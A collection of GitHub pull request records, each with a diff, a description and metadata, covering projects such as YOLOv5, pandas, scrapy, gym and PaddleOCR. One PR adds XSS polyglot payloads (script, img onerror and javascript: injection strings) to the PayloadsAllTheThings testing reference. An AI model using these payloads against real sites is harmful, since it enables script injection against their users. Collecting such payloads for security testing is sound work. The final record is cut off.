diff --git a/maths/gaussian.py b/maths/gaussian.py index 5d5800e00989..a5dba50a927d 100644 --- a/maths/gaussian.py +++ b/maths/gaussian.py @@ -1,9 +1,5 @@ """ Reference: https://en.wikipedia.org/wiki/Gaussian_function - -python/black : True -python : 3.7.3 - """ from numpy import exp, pi, sqrt @@ -16,6 +12,12 @@ def gaussian(x, mu: float = 0.0, sigma: float = 1.0) -> int: >>> gaussian(24) 3.342714441794458e-126 + >>> gaussian(1, 4, 2) + 0.06475879783294587 + + >>> gaussian(1, 5, 3) + 0.05467002489199788 + Supports NumPy Arrays Use numpy.meshgrid with this to generate gaussian blur on images. >>> import numpy as np @@ -49,8 +51,8 @@ def gaussian(x, mu: float = 0.0, sigma: float = 1.0) -> int: >>> gaussian(2523, mu=234234, sigma=3425) 0.0 - """ - return 1 / sqrt(2 * pi * sigma ** 2) * exp(-((x - mu) ** 2) / 2 * sigma ** 2) + """ + return 1 / sqrt(2 * pi * sigma ** 2) * exp(-((x - mu) ** 2) / (2 * sigma ** 2)) if __name__ == "__main__":
I have added the parenthesis around the 2*sigma^2 term. ### **Describe your change:** * [ ] Add an algorithm? * [x] Fix a bug or typo in an existing algorithm? * [ ] Documentation change? ### **Checklist:** * [x] I have read [CONTRIBUTING.md](https://github.com/TheAlgorithms/Python/blob/master/CONTRIBUTING.md). * [x] This pull request is all my own work -- I have not plagiarized. * [x] I know that pull requests will not be merged if they fail the automated tests. * [x] This PR only changes one algorithm file. To ease review, please open separate PRs for separate algorithms. * [x] All new Python files are placed inside an existing directory. * [x] All filenames are in all lowercase characters with no spaces or dashes. * [x] All functions and variable names follow Python naming conventions. * [x] All function parameters and return values are annotated with Python [type hints](https://docs.python.org/3/library/typing.html). * [x] All functions have [doctests](https://docs.python.org/3/library/doctest.html) that pass the automated testing. * [x] All new algorithms have a URL in its comments that points to Wikipedia or other similar explanation. * [x] If this pull request resolves one or more open issues then the commit message contains `Fixes: #{$ISSUE_NO}`.
https://api.github.com/repos/TheAlgorithms/Python/pulls/2249
2020-07-28T20:09:04Z
2020-07-29T19:32:37Z
2020-07-29T19:32:37Z
2020-07-30T08:33:34Z
386
TheAlgorithms/Python
29,556
Add EXIF rotation to YOLOv5 Hub inference
diff --git a/models/common.py b/models/common.py index 5ffb8440b60..9911b207d06 100644 --- a/models/common.py +++ b/models/common.py @@ -1,9 +1,9 @@ # YOLOv5 common modules -import math from copy import copy from pathlib import Path +import math import numpy as np import pandas as pd import requests @@ -12,7 +12,7 @@ from PIL import Image from torch.cuda import amp -from utils.datasets import letterbox +from utils.datasets import exif_transpose, letterbox from utils.general import non_max_suppression, make_divisible, scale_coords, increment_path, xyxy2xywh, save_one_box from utils.plots import colors, plot_one_box from utils.torch_utils import time_synchronized @@ -252,9 +252,10 @@ def forward(self, imgs, size=640, augment=False, profile=False): for i, im in enumerate(imgs): f = f'image{i}' # filename if isinstance(im, str): # filename or uri - im, f = np.asarray(Image.open(requests.get(im, stream=True).raw if im.startswith('http') else im)), im + im, f = Image.open(requests.get(im, stream=True).raw if im.startswith('http') else im), im + im = np.asarray(exif_transpose(im)) elif isinstance(im, Image.Image): # PIL Image - im, f = np.asarray(im), getattr(im, 'filename', f) or f + im, f = np.asarray(exif_transpose(im)), getattr(im, 'filename') or f files.append(Path(f).with_suffix('.jpg').name) if im.shape[0] < 5: # image in CHW im = im.transpose((1, 2, 0)) # reverse dataloader .transpose(2, 0, 1) diff --git a/utils/datasets.py b/utils/datasets.py index 55f046cd56d..f7315522e37 100755 --- a/utils/datasets.py +++ b/utils/datasets.py @@ -64,6 +64,32 @@ def exif_size(img): return s +def exif_transpose(image): + """ + Transpose a PIL image accordingly if it has an EXIF Orientation tag. + From https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py + + :param image: The image to transpose. + :return: An image. + """ + exif = image.getexif() + orientation = exif.get(0x0112, 1) # default 1 + if orientation > 1: + method = {2: Image.FLIP_LEFT_RIGHT, + 3: Image.ROTATE_180, + 4: Image.FLIP_TOP_BOTTOM, + 5: Image.TRANSPOSE, + 6: Image.ROTATE_270, + 7: Image.TRANSVERSE, + 8: Image.ROTATE_90, + }.get(orientation) + if method is not None: + image = image.transpose(method) + del exif[0x0112] + image.info["exif"] = exif.tobytes() + return image + + def create_dataloader(path, imgsz, batch_size, stride, single_cls=False, hyp=None, augment=False, cache=False, pad=0.0, rect=False, rank=-1, workers=8, image_weights=False, quad=False, prefix=''): # Make sure only the first process in DDP process the dataset first, and the following others can use the cache
## 🛠️ PR Summary <sub>Made with ❤️ by [Ultralytics Actions](https://github.com/ultralytics/actions)<sub> ### 🌟 Summary Improved image loading with EXIF-based auto-rotation in YOLOv5. ### 📊 Key Changes - Added `exif_transpose` function to correct image orientation based on EXIF data. - Integrated `exif_transpose` into the image loading process within the `forward` method. - Minor code rearrangement: moved `import math` for better organization. ### 🎯 Purpose & Impact - 🔄 Ensures images are correctly oriented as per their EXIF orientation tag, preventing issues with wrongly rotated images during processing. - 🖼️ Improves the robustness of the model's inference on images uploaded directly from various devices, particularly smartphones. - ➡️ Potential impact includes more accurate detections and a better user experience with YOLOv5, especially when handling images from different sources with orientation metadata.
https://api.github.com/repos/ultralytics/yolov5/pulls/3852
2021-07-01T09:24:49Z
2021-07-02T11:25:55Z
2021-07-02T11:25:54Z
2024-01-19T17:12:03Z
830
ultralytics/yolov5
24,844
Added couple AWS/Kubernetes answers
diff --git a/certificates/aws-cloud-practitioner.md b/certificates/aws-cloud-practitioner.md index 75c273098..88d32ae64 100644 --- a/certificates/aws-cloud-practitioner.md +++ b/certificates/aws-cloud-practitioner.md @@ -40,6 +40,13 @@ SAAS * Public * Hybrid * Private</summary><br><b> + +- Public - Public cloud is when you leverage cloud services over the open internet on hardware owned by the cloud provider, but its usage is shared by other companies.<br> + +- Hybrid - A hybrid cloud is a cloud computing environment that uses a mix of combining a public and private cloud environment, like an on-premises data center, and public CSPs.<br> + +- Private - Private cloud means that the cloud infrastructure is provisioned for exclusive use by a single organization. + [Read more](https://aws.amazon.com/types-of-cloud-computing/) </b></details> #### AWS Global Infrastructure diff --git a/exercises/aws/README.md b/exercises/aws/README.md index 404b05051..3f8838eea 100644 --- a/exercises/aws/README.md +++ b/exercises/aws/README.md @@ -1246,7 +1246,7 @@ For example, port `2017` and endpoint `/health`. <details> <summary>Which type of AWS load balancer is used in the following drawing?<br> -<img src="images/aws/identify_load_balancer.png" width="300x;" height="400px;"/> +<img src="images/aws/identify_load_balancer.png" width="300px;" height="400px;"/> </summary><br><b> Application Load Balancer (routing based on different endpoints + HTTP is used). diff --git a/exercises/kubernetes/README.md b/exercises/kubernetes/README.md index e55a4a1cf..4fd8f3ee3 100644 --- a/exercises/kubernetes/README.md +++ b/exercises/kubernetes/README.md @@ -137,9 +137,9 @@ False. A Kubernetes cluster consists of at least 1 master and can have 0 workers <details> <summary>Place the components on the right side of the image in the right place in the drawing<br> -<img src="images/kubernetes/kubernetes_components.png"/> +<img src="images/kubernetes/kubernetes_components.png" height="300px" width="300px"/> </summary><br><b> -<img src="images/kubernetes/kubernetes_components_solution.png"/> +<img src="images/kubernetes/kubernetes_components_solution.png" height="300px" width="300px"/> </b></details> <details> @@ -1015,6 +1015,7 @@ etcd <details> <summary>What is etcd?</summary><br><b> + etcd is an open source distributed key-value store used to hold and manage the critical information that distributed systems need to keep running.[Read more](https://www.redhat.com/en/topics/containers/what-is-etcd) </b></details> <details> @@ -1248,10 +1249,12 @@ kubectl delete pods --field-selector=status.phase!='Running' <details> <summary>What <code>kubectl logs [pod-name]</code> command does?</summary><br><b> + Print the logs for a container in a pod. </b></details> <details> <summary>What <code>kubectl describe pod [pod name] does?</code> command does?</summary><br><b> + Show details of a specific resource or group of resources. </b></details> <details> @@ -1397,6 +1400,7 @@ It includes: <details> <summary>Explain StatefulSet</summary><br><b> + StatefulSet is the workload API object used to manage stateful applications. Manages the deployment and scaling of a set of Pods, and provides guarantees about the ordering and uniqueness of these Pods.[Learn more](https://kubernetes.io/docs/concepts/workloads/controllers/statefulset/) </b></details> #### Kubernetes - Secrets @@ -1666,6 +1670,7 @@ To fix it, these lines should placed in the spec of the cron job, above or under <details> <summary>Explain Imperative Management vs. Declarative Management</summary><br><b> + </b></details> <details> @@ -1680,6 +1685,7 @@ Namespaces will allow to limit resources and also make sure there are no collisi <details> <summary>What Kube Proxy does?</summary><br><b> + Kube Proxy is a network proxy that runs on each node in your cluster, implementing part of the Kubernetes Service concept </b></details> <details> @@ -1722,6 +1728,7 @@ Scale the number of pods automatically on observed CPU utilization. <details> <summary>What does being cloud-native mean?</summary><br><b> + The term cloud native refers to the concept of building and running applications to take advantage of the distributed computing offered by the cloud delivery model. </b></details> <details>
https://api.github.com/repos/bregman-arie/devops-exercises/pulls/204
2022-01-24T15:30:12Z
2022-01-24T17:27:08Z
2022-01-24T17:27:08Z
2022-01-24T17:27:08Z
1,131
bregman-arie/devops-exercises
17,478
include low, high, & dtype in spaces.Box.__repr__
diff --git a/gym/spaces/box.py b/gym/spaces/box.py index bad74f7ac09..0f9f26f92ff 100644 --- a/gym/spaces/box.py +++ b/gym/spaces/box.py @@ -134,7 +134,7 @@ def from_jsonable(self, sample_n): return [np.asarray(sample) for sample in sample_n] def __repr__(self): - return "Box" + str(self.shape) + return "Box({}, {}, {}, {})".format(self.low.min(), self.high.max(), self.shape, self.dtype) def __eq__(self, other): return isinstance(other, Box) and (self.shape == other.shape) and np.allclose(self.low, other.low) and np.allclose(self.high, other.high)
multitask learners need a way to make a sensor for each space, and it's possible for two different Box spaces to have the same shape but different low/high/dtype, so this pull request just adds the minimum low value, maximum high value, and the dtype to `Box.__repr__` so we can use `str(box_space)` as a key in a ModuleDict of sensors (helps normalize inputs)
https://api.github.com/repos/openai/gym/pulls/1974
2020-06-23T18:31:04Z
2020-08-14T22:30:58Z
2020-08-14T22:30:58Z
2020-08-14T22:30:59Z
182
openai/gym
5,544
kraken max amount
diff --git a/js/kraken.js b/js/kraken.js index 67a01b791b91..2902bbe06f06 100644 --- a/js/kraken.js +++ b/js/kraken.js @@ -457,7 +457,7 @@ module.exports = class kraken extends Exchange { 'limits': { 'amount': { 'min': minAmount, - 'max': Math.pow (10, precision['amount']), + 'max': undefined, }, 'price': { 'min': Math.pow (10, -precision['price']),
looks strange. And don't work on practice, I can create order with bigger amount
https://api.github.com/repos/ccxt/ccxt/pulls/10744
2021-11-30T15:45:58Z
2021-11-30T17:29:14Z
2021-11-30T17:29:14Z
2021-11-30T17:29:14Z
131
ccxt/ccxt
13,915
BUG: Fix conditional for underlying price in io.data.options.
diff --git a/pandas/io/data.py b/pandas/io/data.py index 13ced745b7b3f..0b1601b143be0 100644 --- a/pandas/io/data.py +++ b/pandas/io/data.py @@ -736,9 +736,8 @@ def _get_option_data(self, month, year, expiry, name): " found".format(table_loc, ntables)) option_data = _parse_options_data(tables[table_loc]) - option_data = self._process_data(option_data) option_data['Type'] = name[:-1] - option_data.set_index(['Strike', 'Expiry', 'Type', 'Symbol'], inplace=True) + option_data = self._process_data(option_data, name[:-1]) if month == CUR_MONTH and year == CUR_YEAR: setattr(self, name, option_data) @@ -859,8 +858,7 @@ def get_near_stock_price(self, above_below=2, call=True, put=False, month=None, year=None, expiry=None): """ ***Experimental*** - Cuts the data frame opt_df that is passed in to only take - options that are near the current stock price. + Returns a data frame of options that are near the current stock price. Parameters ---------- @@ -889,7 +887,6 @@ def get_near_stock_price(self, above_below=2, call=True, put=False, Note: Format of returned data frame is dependent on Yahoo and may change. """ - year, month, expiry = self._try_parse_dates(year, month, expiry) to_ret = Series({'calls': call, 'puts': put}) to_ret = to_ret[to_ret].index @@ -897,26 +894,31 @@ def get_near_stock_price(self, above_below=2, call=True, put=False, data = {} for nam in to_ret: - if month: - m1 = _two_char_month(month) - name = nam + m1 + str(year)[2:] + df = self._get_option_data(month, year, expiry, nam) + data[nam] = self.chop_data(df, above_below, self.underlying_price) + + return concat([data[nam] for nam in to_ret]).sortlevel() + + def chop_data(self, df, above_below=2, underlying_price=None): + """Returns a data frame only options that are near the current stock price.""" + if not underlying_price: try: - df = getattr(self, name) + underlying_price = self.underlying_price except AttributeError: - meth_name = 'get_{0}_data'.format(nam[:-1]) - df = getattr(self, meth_name)(expiry=expiry) + underlying_price = np.nan - if self.underlying_price: - start_index = np.where(df.index.get_level_values('Strike') - > self.underlying_price)[0][0] + if underlying_price is not np.nan: + start_index = np.where(df.index.get_level_values('Strike') + > underlying_price)[0][0] - get_range = slice(start_index - above_below, + get_range = slice(start_index - above_below, start_index + above_below + 1) - chop = df[get_range].dropna(how='all') - data[nam] = chop + df = df[get_range].dropna(how='all') + + return df + - return concat([data[nam] for nam in to_ret]).sortlevel() @staticmethod def _try_parse_dates(year, month, expiry): @@ -1048,7 +1050,7 @@ def get_forward_data(self, months, call=True, put=False, near=False, frame = self.get_near_stock_price(call=call, put=put, above_below=above_below, month=m2, year=y2) - frame = self._process_data(frame) + frame = self._process_data(frame, name[:-1]) all_data.append(frame) @@ -1178,7 +1180,7 @@ def _parse_url(self, url): return root - def _process_data(self, frame): + def _process_data(self, frame, type): """ Adds columns for Expiry, IsNonstandard (ie: deliverable is not 100 shares) and Tag (the tag indicating what is actually deliverable, None if standard). @@ -1195,5 +1197,7 @@ def _process_data(self, frame): frame['Underlying_Price'] = self.underlying_price frame["Quote_Time"] = self.quote_time frame.rename(columns={'Open Int': 'Open_Int'}, inplace=True) + frame['Type'] = type + frame.set_index(['Strike', 'Expiry', 'Type', 'Symbol'], inplace=True) return frame diff --git a/pandas/io/tests/test_data.py b/pandas/io/tests/test_data.py index 8b5a81f050ced..15ebeba941ccd 100644 --- a/pandas/io/tests/test_data.py +++ b/pandas/io/tests/test_data.py @@ -250,6 +250,9 @@ def setUpClass(cls): cls.html2 = os.path.join(cls.dirpath, 'yahoo_options2.html') cls.root1 = cls.aapl._parse_url(cls.html1) cls.root2 = cls.aapl._parse_url(cls.html2) + cls.tables1 = cls.aapl._parse_option_page_from_yahoo(cls.root1) + cls.unprocessed_data1 = web._parse_options_data(cls.tables1[cls.aapl._TABLE_LOC['puts']]) + cls.data1 = cls.aapl._process_data(cls.unprocessed_data1, 'put') @classmethod def tearDownClass(cls): @@ -324,6 +327,13 @@ def test_sample_page_price_quote_time1(self): self.assertIsInstance(price, (int, float, complex)) self.assertIsInstance(quote_time, (datetime, Timestamp)) + def test_chop(self): + #regression test for #7625 + self.aapl.chop_data(self.data1, above_below=2, underlying_price=np.nan) + chopped = self.aapl.chop_data(self.data1, above_below=2, underlying_price=300) + self.assertIsInstance(chopped, DataFrame) + self.assertTrue(len(chopped) > 1) + @network def test_sample_page_price_quote_time2(self): #Tests the weekday quote time format @@ -334,10 +344,7 @@ def test_sample_page_price_quote_time2(self): @network def test_sample_page_chg_float(self): #Tests that numeric columns with comma's are appropriately dealt with - tables = self.aapl._parse_option_page_from_yahoo(self.root1) - data = web._parse_options_data(tables[self.aapl._TABLE_LOC['puts']]) - option_data = self.aapl._process_data(data) - self.assertEqual(option_data['Chg'].dtype, 'float64') + self.assertEqual(self.data1['Chg'].dtype, 'float64') class TestOptionsWarnings(tm.TestCase):
Refactor and regression test. Fixes #7685
https://api.github.com/repos/pandas-dev/pandas/pulls/7688
2014-07-08T05:31:10Z
2014-07-08T23:33:47Z
2014-07-08T23:33:47Z
2014-07-09T04:38:52Z
1,577
pandas-dev/pandas
44,833
fix disconnecting sleep
diff --git a/code/default/gae_proxy/local/check_ip.py b/code/default/gae_proxy/local/check_ip.py index e3257f7030..faa94fba5e 100755 --- a/code/default/gae_proxy/local/check_ip.py +++ b/code/default/gae_proxy/local/check_ip.py @@ -140,7 +140,7 @@ def load_proxy_config(): network_fail_lock = threading.Lock() def connect_ssl(ip, port=443, timeout=5, check_cert=True, close_cb=None): - if check_local_network.is_ok(ip): + if not check_local_network.is_ok(ip): with network_fail_lock: time.sleep(0.1)
https://api.github.com/repos/XX-net/XX-Net/pulls/8732
2017-11-28T19:31:49Z
2017-11-28T23:56:05Z
2017-11-28T23:56:05Z
2017-11-28T23:56:05Z
148
XX-net/XX-Net
17,086
Fix: mask editor inpaint area
diff --git a/web/extensions/core/maskeditor.js b/web/extensions/core/maskeditor.js index bb2f16d42b..f6b035bdce 100644 --- a/web/extensions/core/maskeditor.js +++ b/web/extensions/core/maskeditor.js @@ -110,6 +110,7 @@ class MaskEditorDialog extends ComfyDialog { createButton(name, callback) { var button = document.createElement("button"); + button.style.pointerEvents = "auto"; button.innerText = name; button.addEventListener("click", callback); return button; @@ -146,6 +147,7 @@ class MaskEditorDialog extends ComfyDialog { divElement.style.display = "flex"; divElement.style.position = "relative"; divElement.style.top = "2px"; + divElement.style.pointerEvents = "auto"; self.brush_slider_input = document.createElement('input'); self.brush_slider_input.setAttribute('type', 'range'); self.brush_slider_input.setAttribute('min', '1'); @@ -173,6 +175,7 @@ class MaskEditorDialog extends ComfyDialog { bottom_panel.style.left = "20px"; bottom_panel.style.right = "20px"; bottom_panel.style.height = "50px"; + bottom_panel.style.pointerEvents = "none"; var brush = document.createElement("div"); brush.id = "brush";
I tried to do an inpaint on my image, and found that I was unable to brush the bottom area, as shown below: <img width="1278" alt="image" src="https://github.com/comfyanonymous/ComfyUI/assets/16166258/8e8aa049-bc90-40a2-8e4d-26ab22ade157"> After investigation, it was caused by an invisible div element that wrapped the buttons and slider. There was an issue https://github.com/comfyanonymous/ComfyUI/issues/2246 and an PR https://github.com/comfyanonymous/ComfyUI/pull/2249 about this problem, but the PR didn't fix that all, so I create this PR.
https://api.github.com/repos/comfyanonymous/ComfyUI/pulls/2679
2024-01-30T06:34:51Z
2024-01-31T06:17:24Z
2024-01-31T06:17:24Z
2024-01-31T06:17:25Z
303
comfyanonymous/ComfyUI
18,038
add new attack patterns from Daniel miessler
diff --git a/XSS injection/README.md b/XSS injection/README.md index 5c72b632e5..c828accab8 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -328,6 +328,9 @@ Polyglot XSS - Rsnake Polyglot XSS - Daniel Miessler ```javascript +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// +'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg"> javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
https://github.com/danielmiessler/SecLists/edit/master/Fuzzing/Polyglots/XSS-Polyglots.txt new attack patterns: line 1, 2, 3.
https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/28
2018-11-16T11:45:57Z
2018-11-16T12:49:36Z
2018-11-16T12:49:36Z
2018-11-16T12:49:36Z
375
swisskyrepo/PayloadsAllTheThings
8,347
Fix windows file descriptor leak
diff --git a/scrapy/extensions/feedexport.py b/scrapy/extensions/feedexport.py index ce2846ebada..6fb6397b1e2 100644 --- a/scrapy/extensions/feedexport.py +++ b/scrapy/extensions/feedexport.py @@ -242,7 +242,9 @@ def open_spider(self, spider): def close_spider(self, spider): slot = self.slot if not slot.itemcount and not self.store_empty: - return + # We need to call slot.storage.store nonetheless to get the file + # properly closed. + return defer.maybeDeferred(slot.storage.store, slot.file) if self._exporting: slot.exporter.finish_exporting() self._exporting = False diff --git a/tests/test_feedexport.py b/tests/test_feedexport.py index f32ac2a4be7..e1436fbe5a7 100644 --- a/tests/test_feedexport.py +++ b/tests/test_feedexport.py @@ -417,7 +417,7 @@ def run_and_export(self, spider_cls, settings=None): content = f.read() finally: - shutil.rmtree(tmpdir, ignore_errors=True) + shutil.rmtree(tmpdir) defer.returnValue(content)
Fixes #3391
https://api.github.com/repos/scrapy/scrapy/pulls/4023
2019-09-17T08:22:16Z
2019-10-22T13:12:53Z
2019-10-22T13:12:53Z
2019-10-22T13:13:07Z
274
scrapy/scrapy
34,267
add faq 20210621
diff --git a/README_ch.md b/README_ch.md index 1dcde536fc..1fcb1fb5fc 100755 --- a/README_ch.md +++ b/README_ch.md @@ -21,7 +21,7 @@ PaddleOCR同时支持动态图与静态图两种编程范式 - 静态图版本:develop分支 **近期更新** -- 2021.6.9 [FAQ](./doc/doc_ch/FAQ.md)新增5个高频问题,总数238个,每周一都会更新,欢迎大家持续关注。 +- 2021.6.22 [FAQ](./doc/doc_ch/FAQ.md)新增5个高频问题,总数243个,每周一都会更新,欢迎大家持续关注。 - PaddleOCR研发团队对最新发版内容技术深入解读,4月13日晚上19:00,[直播地址](https://live.bilibili.com/21689802)。 - 2021.4.8 release 2.1版本,新增AAAI 2021论文[端到端识别算法PGNet](./doc/doc_ch/pgnet.md)开源,[多语言模型](./doc/doc_ch/multi_languages.md)支持种类增加到80+。 - 2021.2.8 正式发布PaddleOCRv2.0(branch release/2.0)并设置为推荐用户使用的默认分支. 发布的详细内容,请参考: https://github.com/PaddlePaddle/PaddleOCR/releases/tag/v2.0.0 @@ -117,8 +117,8 @@ PaddleOCR同时支持动态图与静态图两种编程范式 - [效果展示](#效果展示) - FAQ - [【精选】OCR精选10个问题](./doc/doc_ch/FAQ.md) - - [【理论篇】OCR通用44个问题](./doc/doc_ch/FAQ.md) - - [【实战篇】PaddleOCR实战174个问题](./doc/doc_ch/FAQ.md) + - [【理论篇】OCR通用50个问题](./doc/doc_ch/FAQ.md) + - [【实战篇】PaddleOCR实战183个问题](./doc/doc_ch/FAQ.md) - [技术交流群](#欢迎加入PaddleOCR技术交流群) - [参考文献](./doc/doc_ch/reference.md) - [许可证书](#许可证书) diff --git a/doc/doc_ch/FAQ.md b/doc/doc_ch/FAQ.md index 51f4bd36fa..25db025845 100755 --- a/doc/doc_ch/FAQ.md +++ b/doc/doc_ch/FAQ.md @@ -9,38 +9,35 @@ ## PaddleOCR常见问题汇总(持续更新) -* [近期更新(2021.6.9)](#近期更新) +* [近期更新(2021.6.22)](#近期更新) * [【精选】OCR精选10个问题](#OCR精选10个问题) -* [【理论篇】OCR通用44个问题](#OCR通用问题) - * [基础知识14题](#基础知识) - * [数据集9题](#数据集2) - * [模型训练调优22题](#模型训练调优2) -* [【实战篇】PaddleOCR实战179个问题](#PaddleOCR实战问题) - * [使用咨询72题](#使用咨询) +* [【理论篇】OCR通用50个问题](#OCR通用问题) + * [基础知识16题](#基础知识) + * [数据集10题](#数据集2) + * [模型训练调优24题](#模型训练调优2) +* [【实战篇】PaddleOCR实战183个问题](#PaddleOCR实战问题) + * [使用咨询77题](#使用咨询) * [数据集19题](#数据集3) * [模型训练调优39题](#模型训练调优3) * [预测部署48题](#预测部署3) <a name="近期更新"></a> -## 近期更新(2021.6.9) +## 近期更新(2021.6.22) -#### Q2.1.14: 在识别模型中,为什么降采样残差结构的stride为(2, 1)? -**A**: stride为(2, 1),表示在图像y方向(高度方向)上stride为2,x方向(宽度方向)上为1。由于待识别的文本图像通常为长方形,这样只在高度方向做下采样,尽量保留宽度方向的序列信息,避免宽度方向下采样后丢失过多的文字信息。 +#### Q2.1.15: 文本识别方法CRNN关键技术有哪些? +**A**: CRNN 关键技术包括三部分。(1)CNN提取图像卷积特征。(2)深层双向LSTM网络,在卷积特征的基础上继续提取文字序列特征。(3)Connectionist Temporal Classification(CTC),解决训练时字符无法对齐的问题。 -#### Q3.2.19: 如何合成手写中文数据集? -**A**: 手写数据集可以通过手写单字数据集合成得到。随机选取一定数量的单字图片和对应的label,将图片高度resize为随机的统一高度后拼接在一起,即可得到合成数据集。对于需要添加文字背景的情况,建议使用阈值化将单字图片的白色背景处理为透明背景,再与真实背景图进行合成。具体可以参考文档[手写数据集](https://github.com/PaddlePaddle/PaddleOCR/blob/a72d6f23be9979e0c103d911a9dca3e4613e8ccf/doc/doc_ch/handwritten_datasets.md)。 +#### Q2.1.16: 百度自研的SRN文本识别方法特点有哪些? +**A**: SRN文本识别方法特点主要有四个部分:(1)使用Transformer Units(TUs)模块加强图像卷积特征的表达能力。(2)提出Parallel Visual Attention Module(PVAM)模块挖掘特征之间的相互关系。(3)提出Global Semantic Reasoning Module(GSRM)模块挖掘识别结果语义相互关系。(4)提出Visual-Semantic Fusion Decoder(VSFD)模块有效融合PVAM提取的视觉特征和GSRM提取的语义特征。 -#### Q3.3.37: 训练过程中,训练程序意外退出/挂起,应该如何解决? -**A**: 考虑内存,显存(使用GPU训练的话)是否不足,可在配置文件中,将训练和评估的batch size调小一些。需要注意,训练batch size调小时,学习率learning rate也要调小,一般可按等比例调整。 +#### Q2.2.10: 文档版面分析常用数据集有哪些? +**A**: 文档版面分析常用数据集常用数据集有PubLayNet、TableBank word、TableBank latex等。 -#### Q3.3.38: 训练程序启动后直到结束,看不到训练过程log? -**A**: 可以从以下三方面考虑: - 1. 检查训练进程是否正常退出、显存占用是否释放、是否有残留进程,如果确定是训练程序卡死,可以检查环境配置,遇到环境问题建议使用docker,可以参考说明文档[安装](https://github.com/PaddlePaddle/PaddleOCR/blob/release/2.1/doc/doc_ch/installation.md)。 - 2. 检查数据集的数据量是否太小,可调小batch size从而增加一个epoch中的训练step数量,或在训练config文件中,将参数print_batch_step改为1,即每一个step打印一次log信息。 - 3. 如果使用私有数据集训练,可先用PaddleOCR提供/推荐的数据集进行训练,排查私有数据集是否存在问题。 +#### Q2.3.23: 文档版面分析常用方法有哪些? +**A**: 文档版面分析通常使用通用目标检测方法,包括Faster RCNN系列,YOLO系列等。面向产业实践,建议使用PaddleDetection中精度和效率出色的PP-YOLO v2目标检测方法进行训练。 -#### Q3.3.39: 配置文件中的参数num workers是什么意思,应该如何设置? -**A**: 训练数据的读取需要硬盘IO,而硬盘IO速度远小于GPU运算速度,为了避免数据读取成为训练速度瓶颈,可以使用多进程读取数据,num workers表示数据读取的进程数量,0表示不使用多进程读取。在Linux系统下,多进程读取数据时,进程间通信需要基于共享内存,因此使用多进程读取数据时,建议设置共享内存不低于2GB,最好可以达到8GB,此时,num workers可以设置为CPU核心数。如果机器硬件配置较低,或训练进程卡死、dataloader报错,可以将num workers设置为0,即不使用多进程读取数据。 +#### Q2.3.24: 如何识别招牌或者广告图中的艺术字? +**A**: 招牌或者广告图中的艺术字是文本识别一个非常挑战的难题,因为艺术字中的单字和印刷体相比,变化非常大。如果需要识别的艺术字是在一个词典列表内,可以将改每个词典认为是一个待识别图像模板,通过通用图像检索识别系统解决识别问题。可以尝试使用PaddleClas的图像识别系统。 <a name="OCR精选10个问题"></a> @@ -187,6 +184,12 @@ #### Q2.1.14: 在识别模型中,为什么降采样残差结构的stride为(2, 1)? **A**: stride为(2, 1),表示在图像y方向(高度方向)上stride为2,x方向(宽度方向)上为1。由于待识别的文本图像通常为长方形,这样只在高度方向做下采样,尽量保留宽度方向的序列信息,避免宽度方向下采样后丢失过多的文字信息。 +#### Q2.1.15: 文本识别方法CRNN关键技术有哪些? +**A**: CRNN 关键技术包括三部分。(1)CNN提取图像卷积特征。(2)深层双向LSTM网络,在卷积特征的基础上继续提取文字序列特征。(3)Connectionist Temporal Classification(CTC),解决训练时字符无法对齐的问题。 + +#### Q2.1.16: 百度自研的SRN文本识别方法特点有哪些? +**A**: SRN文本识别方法特点主要有四个部分:(1)使用Transformer Units(TUs)模块加强图像卷积特征的表达能力。(2)提出Parallel Visual Attention Module(PVAM)模块挖掘特征之间的相互关系。(3)提出Global Semantic Reasoning Module(GSRM)模块挖掘识别结果语义相互关系。(4)提出Visual-Semantic Fusion Decoder(VSFD)模块有效融合PVAM提取的视觉特征和GSRM提取的语义特征。 + <a name="数据集2"></a> ### 数据集 @@ -225,6 +228,10 @@ #### Q2.2.9: 端到端算法PGNet使用的是什么类型的数据集呢? **A**: PGNet目前可以使用四点标注数据集,也可以使用多点标注数据集(十四点),多点标注训练的效果要比四点的好,一种可以尝试的策略是先在四点数据集上训练,之后用多点数据集在此基础上继续训练。 +#### Q2.2.10: 文档版面分析常用数据集有哪些? +**A**: 文档版面分析常用数据集常用数据集有PubLayNet、TableBank word、TableBank latex等。 + + <a name="模型训练调优2"></a> ### 模型训练调优 @@ -287,7 +294,7 @@ **A**:建议可以先了解OCR方向的基础知识,大概了解基础的检测和识别模型算法。然后在Github上可以查看OCR方向相关的repo。目前来看,从内容的完备性来看,PaddleOCR的中英文双语教程文档是有明显优势的,在数据集、模型训练、预测部署文档详实,可以快速入手。而且还有微信用户群答疑,非常适合学习实践。项目地址:[PaddleOCR](https://github.com/PaddlePaddle/PaddleOCR) -#### Q3.12:如何识别带空格的英文行文本图像? +#### Q2.3.12:如何识别带空格的英文行文本图像? **A**:空格识别可以考虑以下两种方案: @@ -338,6 +345,12 @@ 当然,知识蒸馏方法日新月异,也欢迎大家提出更多的总结与建议。 +#### Q2.3.23: 文档版面分析常用方法有哪些? +**A**: 文档版面分析通常使用通用目标检测方法,包括Faster RCNN系列,YOLO系列等。面向产业实践,建议使用PaddleDetection中精度和效率出色的PP-YOLO v2目标检测方法进行训练。 + +#### Q2.3.24: 如何识别招牌或者广告图中的艺术字? +**A**: 